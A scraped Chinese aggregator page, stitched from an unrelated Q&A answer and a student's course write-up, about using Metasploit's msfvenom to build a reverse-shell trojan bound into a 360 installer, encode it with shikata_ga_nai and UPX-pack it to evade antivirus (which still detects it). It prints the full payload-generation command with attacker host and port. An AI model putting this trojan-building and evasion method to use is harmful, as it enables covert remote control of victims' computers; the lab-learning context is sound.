如何打造一款免杀Metasploit WAR木马

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了如何打造一款免杀Metasploit WAR木马相关的知识,希望对你有一定的参考价值。

参考技术A 1,不要随意的去下载电脑病毒
2,因为电脑病毒进入电脑第一个锁的就是你的电脑
3,遇到病毒需要及时安装电脑管家在安全模式下杀毒本回答被提问者采纳

2017-2018-1 20179202《Linux内核原理与分析》第十一周作业

Metasploit实现木马生成、捆绑、免杀

1.预备知识

(1)Metasploit

Metasploit是一款开源的安全漏洞检测工具,全称叫做The Metasploit Framework,简称MSF。MSF是一个漏洞框架,它允许使用者开发自己的漏洞脚本,从而进行测试。下图为Metasploit的体系结构:

          图片来源玩转Metasploit系列(第一集)

基础库文件

  • Rex:Metasploit中的基础库,用于支持不同的协议、转换,以及套接字处理
  • MSF CORE:该库对框架进行了定义,同时提供Metasploit的基本应用界面
  • MSF BASE:该库提供了Metasploit框架的一个简化的、友好的应用界面

模块(通过Metasploit框架所装载、集成并对外提供的最核心的渗透测试功能实现代码)

  • 渗透攻击模块(Exploits):利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对目标系统访问控制权的代码组件
  • 攻击载荷模块(Payloads):在渗透攻击成功后促使目标系统运行的一段植入代码,通常作用是为渗透攻击者打开在目标系统上的控制会话连接
  • 编码器模块(Encoders):确保攻击载荷中不会出现渗透攻击过程中应加以避免的”坏字符“;对攻击载荷进行”免杀“处理
  • 后渗透攻击模块(Post-Modes):主要支持在渗透攻击取得目标系统远程控制权之后,在受控系统中进行各种各样的后渗透攻击动作,比如获取敏感信息,进一步括展,实施跳板攻击等
  • 辅助模块(Auxiliary):没有攻击载荷的漏洞攻击,用于诸如端口扫描、指纹验证、服务扫描等任务中

(2)攻击载荷工具

  • msfpayload:用于生产并输出Metasploit所有类型的可用shell代码
  • msfencode:对msfpayload生成的shell代码进行编码,使得shell代码能够适应目标系统环境,更好地实现其功能
  • msfvenom:是msfpayload和msfencode的混合体

2.实验

(1)选择攻击载荷

输入msfconsole进入metasploit控制台:

输入show payloads查看所有可以使用的攻击载荷信息:

此次实验我们使用的是windows/shell_reverse_tcp(一个简单的反弹shell程序,功能是连接靶机的命令行)。

(2)选择捆绑文件

可以创建自己的EXE文件,也可以捆绑到其他EXE文件。本次实验选择捆绑,我找了360的安装软件(360.exe)

(3)免杀

制作一个免杀的木马来绕过杀毒软件的检测。在Meatsploit框架下免杀的方式之一是使用MSF编码器。msfvenom -l encoders查看编码方式(并不是所有的编码方式都在windows系统上可用):

本次实验选择x86/shikata_ga_nai

(4)生成、捆绑、免杀的实现

实验环境:

攻击机 Kali linux IP:192.168.177.133

靶机 win7 IP:192.168.177.1

命令解释:

msfvenom -p windows/shell_reverse_tcp 使用shell_reverse_tcp攻击载荷
LHOST=192.168.177.133                 设置攻击者IP地址
LPORT=8080                          设置攻击者的监听端口,用于接收木马的链接请求
-e x86/shikata_ga_nai                 使用shikata_ga_nai的编码方式
-x 360.exe                            将木马捆绑在360.exe上
-i 5                                  对目标进行5次编码
-f exe                                指定MSF编码器输出格式为exe
-o /root/backdoor.exe                 指定处理完毕后的文件输出路径

下面进行测试,设置好后等待木马的链接:

在win7上运行制作好的backdoor.exe,很遗憾被360查杀:

用不同的编码方式多编码几次:

运行后仍旧被360查杀:

再尝试加壳处理,输入upx参看upx加壳软件参数。upx -5 backdoor.exe 对backdoor.exe进行加壳(此处为压缩处理,加壳的不便之处就是会改变源文件的大小,有经验的安全人员很容易发现这点差别):

尴尬 ......依然被查杀,可以看到木马名称有变:

由于是第一次接触安全系统与软件,所以本次实验感谢王政同学的指导,遇到的问题再仔细琢磨后解决。

以上是关于如何打造一款免杀Metasploit WAR木马的主要内容,如果未能解决你的问题,请参考以下文章

2017-2018-1 20179202《Linux内核原理与分析》第十一周作业

打造一款Socket型免杀无弹窗的shellcode

IPC$远程植入木马

Metasploit+python生成免杀exe过360杀毒

分享一个免杀的反弹shell工具(python脚本转换成exe)

[源码]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)